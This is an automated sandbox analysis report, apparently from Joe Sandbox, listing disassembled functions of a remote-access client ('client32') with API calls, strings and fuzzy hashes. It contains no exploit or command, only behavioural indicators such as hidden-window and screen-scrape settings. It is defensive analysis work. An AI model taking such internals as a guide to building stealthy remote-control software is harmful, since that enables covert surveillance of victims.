Download Yara Rule

APIs

Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516

_free.LIBCMT ref: 1112131D

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 11121333
_free.LIBCMT ref: 11121348
GdiFlush.GDI32(?,?,?,00698D88), ref: 11121350
_free.LIBCMT ref: 1112135D
_free.LIBCMT ref: 11121371
SelectObject.GDI32(?,?), ref: 1112138D
DeleteObject.GDI32(?), ref: 1112139A
GetLastError.KERNEL32(?,?,?,?,?,00698D88), ref: 111213A4
DeleteDC.GDI32(?), ref: 111213CB
ReleaseDC.USER32(?,?), ref: 111213DE
DeleteDC.GDI32(?), ref: 111213EB
InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8

Strings

Error deleting membm, e=%d, xrefs: 111213AB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
String ID: Error deleting membm, e=%d
API String ID: 3195047866-709490903
Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65

Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000017DD), ref: 110CF18A
ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
GetWindowRect.USER32(00000000,?), ref: 110CF1DD
GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
GetClientRect.USER32(00000000,?), ref: 110CF3C3
CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400

Strings

m_eh, xrefs: 110CF2B5
m_hWnd, xrefs: 110CF1C5, 110CF259, 110CF2E9, 110CF3AB
Static, xrefs: 110CF3F9
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CF1C0, 110CF254, 110CF2E4, 110CF3A6
..\ctl32\nsmdlg.cpp, xrefs: 110CF2B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCreateItemLongObjectShowText
String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
API String ID: 4172769820-2231854162
Opcode ID: 65bc0e660380c42035a20732b64b716a1f83c677b339e53b07408d9ca9b16d2e
Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
Opcode Fuzzy Hash: 65bc0e660380c42035a20732b64b716a1f83c677b339e53b07408d9ca9b16d2e
Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92

Function 110B39F0 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,B6DE5DE1,111F10F8,111E6C98,?), ref: 110B3A64
UnionRect.USER32(?,?,?), ref: 110B3B12
LeaveCriticalSection.KERNEL32(?), ref: 110B3CAD

Strings

View, xrefs: 110B3A2F
Client, xrefs: 110B3ABC, 110B3B6C, 110B3B89, 110B3BA6, 110B3BC3, 110B3BF6
ScrapeBandwidth, xrefs: 110B3BBE
ScrapeNotBusyDelay, xrefs: 110B3BA1
ScrapeBusyDelay, xrefs: 110B3B84
8, xrefs: 110B3C0A
ScrapeBandwidthPeriod, xrefs: 110B3BF1
ScrapeSkipDelay, xrefs: 110B3B67
d, xrefs: 110B3A4E
limitcolorbits, xrefs: 110B3A22, 110B3AB7

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveRectUnion__wcstoi64
String ID: 8$Client$ScrapeBandwidth$ScrapeBandwidthPeriod$ScrapeBusyDelay$ScrapeNotBusyDelay$ScrapeSkipDelay$View$d$limitcolorbits
API String ID: 3518726166-774679399
Opcode ID: 9ed2b62170dfdd6d390585d58a5c009429d8adca9bb6f56d08ac168bf57d857b
Instruction ID: aebd380d628d0b1599e2b276af2785b4fa2c3b861337a9a0e451ff4e8484ea1a
Opcode Fuzzy Hash: 9ed2b62170dfdd6d390585d58a5c009429d8adca9bb6f56d08ac168bf57d857b
Instruction Fuzzy Hash: AE915A78E04259AFDB44CFA5D980BEDFBF1FB48304F20815AE909AB344D731A841CB98

Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000017D,B6DE5DE1,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
_memset.LIBCMT ref: 1110F4C2
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE

Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
_free.LIBCMT ref: 1110F628
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,B6DE5DE1,0000017D,00000001), ref: 1110F681

Strings

End Record %s, xrefs: 1110F442
PCIR, xrefs: 1110F5C9, 1110F5CC

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
String ID: End Record %s$PCIR
API String ID: 4278564793-2672865668
Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91

Function 11131320 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 187COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457

Strings

StatusMode, xrefs: 1113146D
Client, xrefs: 11131472
#32770, xrefs: 111313CC, 11131416
8zi, xrefs: 111313A9, 111314DA
UI.CPP, xrefs: 1113143C
Hidden, xrefs: 111313C7, 11131411
gUI.hidden_window, xrefs: 11131441

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLastShowWindow
String ID: #32770$8zi$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
API String ID: 3252650109-996149668
Opcode ID: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
Opcode Fuzzy Hash: 3934f158285cda88db21c3109430663c83d793430f4a9331a1973ddc11de89e1
Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84

Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wtsapi32.dll,B6DE5DE1,1102E747,?,00000000), ref: 110F711B
GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
wsprintfA.USER32 ref: 110F7235
SetLastError.KERNEL32(00000078), ref: 110F7242
wsprintfA.USER32 ref: 110F7267
GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
SetLastError.KERNEL32(00000078), ref: 110F72BC
FreeLibrary.KERNEL32(?), ref: 110F72D0

Strings

%u.%u.%u.%u, xrefs: 110F7261
WTSQuerySessionInformationA, xrefs: 110F716F
WTSFreeMemory, xrefs: 110F72A1
%x:%x:%x:%x:%x:%x:%x:%x, xrefs: 110F722F
Wtsapi32.dll, xrefs: 110F7113

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
API String ID: 856016564-3838485836
Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20

Function 110278D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 136threadwindowsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11027914

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11027983
PostMessageA.USER32(00000000,00000501,00000000,00000000), ref: 110279A0
SetEvent.KERNEL32(00000280), ref: 110279B1
Sleep.KERNEL32(00000032), ref: 110279B9
PostMessageA.USER32(00000000,00000800,00000000,00000000), ref: 110279EE
GetCurrentThreadId.KERNEL32 ref: 11027A1A
GetThreadDesktop.USER32(00000000), ref: 11027A21
SetThreadDesktop.USER32(00000000), ref: 11027A2A
CloseDesktop.USER32(00000000), ref: 11027A35
CloseHandle.KERNEL32(00000000), ref: 11027A75

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

Strings

Async, xrefs: 110278F8
8zi, xrefs: 110279F4, 11027A07

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
String ID: 8zi$Async
API String ID: 3276504616-2761944757
Opcode ID: 8722d45516e29e2188e7c874c8846437a67ef99491f74499469f6d5b5f729222
Instruction ID: e67d87833e8f5e22c8d898940d2622bc971bcbde67a649a31d645776c06e00d8
Opcode Fuzzy Hash: 8722d45516e29e2188e7c874c8846437a67ef99491f74499469f6d5b5f729222
Instruction Fuzzy Hash: 1441DF74B427259BE705DFE4C884B6AF7A8BB54718F000178E921DB688EB70A900CB91

Function 1112BDA0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 125libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,?,1112C7C7), ref: 1112BDBC
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 1112BDD4
FreeLibrary.KERNEL32(00000000,?,1112C7C7), ref: 1112BE10

Strings

IPHLPAPI.DLL, xrefs: 1112BDAA
result, xrefs: 1112BE8B
..\CTL32\tcputil.c, xrefs: 1112BDE5, 1112BE3D, 1112BE86
pGetAdaptersInfo, xrefs: 1112BDEA
GetAdaptersInfo, xrefs: 1112BDCE
err == 0, xrefs: 1112BE42

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ..\CTL32\tcputil.c$GetAdaptersInfo$IPHLPAPI.DLL$err == 0$pGetAdaptersInfo$result
API String ID: 145871493-4156997332
Opcode ID: 6ad675757530fbc252020c318acff17dc0746c6d569c41fd04b068a4141d1d52
Instruction ID: 3e811d6c6afe12d56c7175a276bcc0ea5846bd71cb9135be89e0bc3a67e002a9
Opcode Fuzzy Hash: 6ad675757530fbc252020c318acff17dc0746c6d569c41fd04b068a4141d1d52
Instruction Fuzzy Hash: 95310776E4032AABEB019EA5AD41BDEF7A8BF04749F900060ED09D7200F771E914C7D6

Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
GetDC.USER32(?), ref: 11025085
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
SelectObject.GDI32(?,00000000), ref: 110250A2
GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
SelectObject.GDI32(?,?), ref: 110250C7
ReleaseDC.USER32(?,?), ref: 110250CF
SetCaretPos.USER32(?,?), ref: 11025111

Strings

, xrefs: 1102502F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
String ID:
API String ID: 4100900918-3916222277
Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60

Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F0FE
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D

Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C

Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88

DeleteObject.GDI32(00000000), ref: 1101F16C
DeleteObject.GDI32(00000000), ref: 1101F178
CreateFontIndirectA.GDI32(?), ref: 1101F187
CreateFontIndirectA.GDI32(?), ref: 1101F19F
GetMenuItemCount.USER32 ref: 1101F1A7
_memset.LIBCMT ref: 1101F1CF
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
__strdup.LIBCMT ref: 1101F221
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279

Strings

0, xrefs: 1101F1E8
MakeOwnerDraw, xrefs: 1101F0E4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
